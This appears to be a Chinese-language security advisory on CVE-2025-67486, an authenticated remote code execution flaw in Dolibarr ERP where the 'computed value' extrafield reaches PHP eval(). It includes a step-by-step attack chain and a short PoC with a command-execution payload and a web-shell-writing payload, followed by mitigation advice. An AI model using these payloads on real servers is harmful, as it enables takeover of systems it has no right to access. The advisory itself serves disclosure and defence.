CVE-2025-67486 CVSS 7.2 高危

CVE-2025-67486 Dolibarr ERP 认证后远程代码执行漏洞

披露日期: 2026-05-08

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-67486

漏洞类型

远程代码执行

CVSS评分

7.2 高危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Dolibarr ERP/CRM

漏洞概述

Dolibarr ERP 22.0.2及更早版本存在严重的认证后远程代码执行漏洞。该漏洞源于用户额外字段功能中的“计算值”字段缺乏充分清理，导致用户输入被直接传入PHP的eval()函数。拥有管理员权限的攻击者可利用此漏洞在服务器上执行任意PHP代码，进而控制服务器。

技术细节

该漏洞位于Dolibarr的核心库文件中，具体涉及用户额外字段的计算逻辑。当管理员在用户配置界面定义或修改“计算值”字段时，应用程序未经过滤直接将用户输入的字符串传递给PHP的eval()函数进行动态求值。由于eval()函数会将字符串作为PHP代码执行，攻击者可构造特定的恶意Payload（如system()函数调用）。当系统触发该字段的计算逻辑时，恶意代码即以Web服务器权限运行。虽然漏洞利用需要管理员权限，但一旦成功，攻击者可绕过安全机制获取服务器完全控制权。

攻击链分析

STEP 1

步骤1：获取管理员权限

攻击者必须拥有Dolibarr系统的管理员账户，以便访问用户额外字段的配置功能。

STEP 2

步骤2：访问漏洞点

登录后台，导航至用户额外字段设置页面，找到“计算值”字段的配置选项。

STEP 3

步骤3：注入恶意代码

在“计算值”输入框中注入恶意的PHP代码（例如：system('whoami')），利用eval()函数的特性。

STEP 4

步骤4：触发代码执行

保存配置或触发相关用户字段的计算逻辑，迫使服务器执行eval()函数，从而运行注入的Payload。

STEP 5

步骤5：获取服务器控制权

成功执行任意系统命令，获取Web服务器权限，进一步控制主机。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// PoC for Dolibarr CVE-2025-67486
// Payload to be entered in the "Computed Value" field of User Extrafields

// Example 1: Execute system command
$payload = "1; system('id'); //";

// Example 2: Write a shell
$payload = "1; file_put_contents('shell.php', '<?php system($_GET[\"cmd\"]); ?>'); //";

?>

影响范围

Dolibarr ERP <= 22.0.2

防御指南

临时缓解措施

目前官方尚未发布修复补丁。建议管理员严格审查后台访问日志，确保管理员账户安全，并在业务允许的情况下，通过禁用受影响的“用户额外字段”功能来降低风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表